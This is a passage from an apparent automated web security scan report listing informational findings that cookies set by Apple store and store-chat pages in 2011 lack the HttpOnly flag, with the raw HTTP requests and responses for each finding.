ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:10:18 GMT
Content-Type: text/html; charset=UTF-8; encoding=UTF8
x-request-id: 9ee0cd3a-433b-4fdb-a40d-174987679e39
Last-Modified: Thu, 03 Feb 2011 18:06:48 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:20:18 GMT
ETag: "2c0fb3004c673fe92c397f046c1740e4"
Vary: accept-encoding
Content-Length: 23515
set-cookie: sfa=us-hed; version="1"; expires=Sun, 31-Jan-2021 18:10:18 GMT; path=/
x-frame-options: sameorigin

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />
   
<t
...[SNIP]...

13.194. http://store.apple.com/us-hed/go/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us-hed/go/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us-hed/go/home HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D1%2C; geo=US; s_sq=appleglobal%2Capplestoreww%2Capplestoreus%2Capplestoreusconsum%3D%2526pid%253DAOS%25253A%252520home/shop_ipod/family/ipod_classic/engrave%2526pidt%253D1%2526oid%253DMTA4NTI1NTY%2526oidt%253D1%2526ot%253DIMAGE%2526oi%253D1%26appleusmac%3D%2526pid%253Dmac%252520-%252520index%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20index%20(US);

Response

HTTP/1.1 303 See Other
Last-Modified: Thu, 03 Feb 2011 17:53:33 GMT
Cache-Control: no-store, private, must-revalidate, proxy-revalidate, max-age=0, pre-check=0, post-check=0, no-cache
Expires: Wed, 02 Feb 2011 17:53:33 GMT
Vary: *
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 17:53:33 GMT
x-request-id: 66647c4e-d078-466f-a838-ec5c4f6aba77
Content-Length: 0
Location: /us-hed/findyourschool
Pragma: no-cache
set-cookie: sfa=us-hed; version="1"; expires=Sun, 31-Jan-2021 17:53:33 GMT; path=/
x-frame-options: sameorigin


13.195. http://store.apple.com/us_smb_78313  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us_smb_78313

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us_smb_78313 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:10:23 GMT
Cache-Control: no-store, private, must-revalidate, proxy-revalidate, max-age=0, pre-check=0, post-check=0, no-cache
Expires: Wed, 02 Feb 2011 18:10:23 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
Vary: *
pragma: no-cache
Date: Thu, 03 Feb 2011 18:10:23 GMT
set-cookie: sfa=us_smb_78313; version="1"; expires=Sun, 31-Jan-2021 18:10:23 GMT; path=/
x-request-id: ad68d84a-2bfd-462a-95fd-47ddb9f0b0b2
Content-Length: 62462
x-frame-options: sameorigin

<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />
   
<title>Welcome to the Apple Store for Business - Apple Store for Business (U.S.)</title>

...[SNIP]...

13.196. https://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.apple.com
Path:   /1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome; s_pathLength=homepage%3D1%2C; geo=US; s_sq=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=apple%20-%20index%20(US);

Response

HTTP/1.1 302 Apple
Date: Thu, 03 Feb 2011 17:49:28 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
set-cookie: wosid=csKICi1o0fYy23BuHZ269hYUg3j; path=/1-800-MY-APPLE/WebObjects/AppleStore.woa;
set-cookie: woinst=920044001; path=/1-800-MY-APPLE/WebObjects/AppleStore.woa;
set-cookie: asbid=sYTT2CTKKJKACXA24; expires=Sun, 03-Feb-2041 09:49:28 GMT; path=/; domain=.apple.com;
set-cookie: asrec=InNybV91cmkiID0gImh0dHA6Ly9zdG9yZS5hcHBsZS5jb20vMS04MDAtTVktQVBQTEUvV2ViT2JqZWN0cy9BcHBsZVN0b3JlIjsKInNybV9zZXNuX2lkIiA9ICJjc0tJQ2kxbzBmWXkyM0J1SFoyNjloWVVnM2oiOwoic3JtX2luc3RfbmJyIiA9ICI5MjAwNDQwMDEiOwoic3JtX3N2ayIgPSB7Cn07CiJzcm1fYXBwX25tIiA9ICJBcHBsZVN0b3JlIjsKInNybV9leHBpcmVzIiA9ICIyMDExLzAyLzAzLTEwOjA0OjI4IjsK; path=/; domain=.apple.com;
last-modified: Thu, 03 Feb 2011 09:49:29 GMT
cache-control: no-store, private, must-revalidate, proxy-revalidate, max-age=0, pre-check=0, post-check=0, no-cache
location: http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/920044001/wo/csKICi1o0fYy23BuHZ269hYUg3j/0.
expires: Tue, 02 Feb 2010 09:49:29 GMT
pragma: no-cache
vary: *
connection: close
content-length: 266
Content-Type: text/html; charset=ISO-8859-1
x-frame-options: sameorigin

Redirecting to &lt;a HREF=&quot;http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/920044001/wo/csKICi1o0fYy23BuHZ269hYUg3j/0.&quot;&gt;http://store.apple.com/1-800-MY-APPLE/WebObjects/Ap
...[SNIP]...

13.197. https://store.apple.com/Apple/WebObjects/OrderStatus.woa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.apple.com
Path:   /Apple/WebObjects/OrderStatus.woa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Apple/WebObjects/OrderStatus.woa HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 18:10:45 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
cache-control: private
cache-control: no-cache
cache-control: no-store
cache-control: must-revalidate
cache-control: max-age=0
expires: Sun, 30-Jan-2011 06:28:28 GMT
pragma: no-cache
set-cookie: wosid=O7XguopRkA6tCQjGACmrgg; version="1"; expires=Mon, 03-Jan-2011 18:10:45 GMT; path=/1-800-MY-APPLE/WebObjects/OrderStatus.woa
set-cookie: woinst=-1; version="1"; expires=Mon, 03-Jan-2011 18:10:45 GMT; path=/1-800-MY-APPLE/WebObjects/OrderStatus.woa
connection: close
content-length: 13819
Content-Type: text/html; charset=UTF-8; encoding=UTF8
x-frame-options: sameorigin


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Apple Order Status</title>

<meta name="robots
...[SNIP]...

13.198. http://storechat.apple.com/hc/6964264/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://storechat.apple.com
Path:   /hc/6964264/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/6964264/?&site=6964264&cmd=mTagStartPage&lpCallId=434987039770-84541859571&protV=20&lpjson=1&page=http%3A//store.apple.com/us/browse/home/shop_ipod/family/ipod_classic%3Fmco%3DMTM3NTMxMzA&id=5000668719&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-us-consumer-sales-english&activePlugin=none&cobrowse=true&PV%21lpCountryCode=us&PV%21lpSegment=consumer&PV%21lpUnit=sales&PV%21lpPageName=AOS%3A%20home/shop_ipod/family/ipod_classic&PV%21lpSection=product%20selection&PV%21lpSubSection=ipod_classic&PV%21pageLoadTime=8%20sec&PV%21visitorActive=1&SV%21lpLanguage=english&SV%21lpPageNameSession=AOS%3A%20home/shop_ipod/family/ipod_classic&title=iPod%20classic%20-%20Apple%20Store%20%28U.S.%29&referrer=http%3A//store.apple.com/us&cobrowse=true HTTP/1.1
Host: storechat.apple.com
Proxy-Connection: keep-alive
Referer: http://store.apple.com/us/browse/home/shop_ipod/family/ipod_classic?mco=MTM3NTMxMzA
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5241864906341434075; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; geo=US; s_ria=Flash%2010%7C; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pv=ipod%20-%20index%20(US); s_orientation=%5B%5BB%5D%5D; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D1%2C; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_ppv=60%2C60%2C1012%2C; s_orientationHeight=1012; s_cc=true; s_sq=appleusmac%3D%2526pid%253Dmac%252520-%252520index%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; LivePersonID=LP i=4680124532241,d=1296755435; HumanClickACTIVE=1296755435605

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:50:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-4680124532241-1296755436:0; expires=Fri, 03-Feb-2012 17:50:36 GMT; path=/hc/6964264
Set-Cookie: HumanClickKEY=5241864906341434075; path=/hc/6964264
Set-Cookie: HumanClickSiteContainerID_6964264=STANDALONE; path=/hc/6964264
Set-Cookie: LivePersonID=-4680124532241-1296755436:-1:-1:-1:-1; expires=Fri, 03-Feb-2012 17:50:36 GMT; path=/hc/6964264
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 03 Feb 2011 17:50:36 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1997

lpConnLib.Process({"ResultSet": {"lpCallId":"434987039770-84541859571","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton(
...[SNIP]...

13.199. http://storechat.apple.com/hc/6964264/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://storechat.apple.com
Path:   /hc/6964264/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/6964264/?&site=6964264&cmd=mTagKnockPage&lpCallId=158123867819-347282631788&protV=20&lpjson=1&id=2137203861&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-us-consumer-sales-english-1%7Cnull%7ClpButton1%7C HTTP/1.1
Host: storechat.apple.com
Proxy-Connection: keep-alive
Referer: http://store.apple.com/us/engrave/MC297LL/A?mco=MTM3NDcxMzk
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5241864906341434075; LivePersonID=-4680124532241-1296755436:-1:-1:-1:-1; HumanClickSiteContainerID_6964264=STANDALONE; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; geo=US; s_ria=Flash%2010%7C; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pv=ipod%20-%20index%20(US); s_orientation=%5B%5BB%5D%5D; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D1%2C; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_ppv=60%2C60%2C1012%2C; s_orientationHeight=1012; LivePersonID=LP i=4680124532241,d=1296755435; HumanClickACTIVE=1296755435605; s_cc=true; s_sq=appleusmac%3D%2526pid%253Dmac%252520-%252520index%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:50:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1296755447230; expires=Fri, 04-Feb-2011 17:50:47 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 03 Feb 2011 17:50:47 GMT
Set-Cookie: HumanClickSiteContainerID_6964264=STANDALONE; path=/hc/6964264
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 28561

lpConnLib.Process({"ResultSet": {"lpCallId":"158123867819-347282631788","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'storechat.apple.co
...[SNIP]...

13.200. http://storechat.apple.com/hc/6964264/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://storechat.apple.com
Path:   /hc/6964264/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/6964264/?&site=6964264&cmd=mTagKnockPage&lpCallId=660799024160-40367446374&protV=20&lpjson=1&id=5000668719&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-us-consumer-sales-english-1%7Cnull%7ClpButton1%7C HTTP/1.1
Host: storechat.apple.com
Proxy-Connection: keep-alive
Referer: http://store.apple.com/us/browse/home/shop_ipod/family/ipod_classic?mco=MTM3NTMxMzA
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
